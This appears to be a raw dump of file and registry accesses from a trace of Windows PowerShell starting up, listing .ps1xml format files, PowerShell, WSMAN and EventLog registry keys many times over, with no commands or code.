c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
Mutex
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
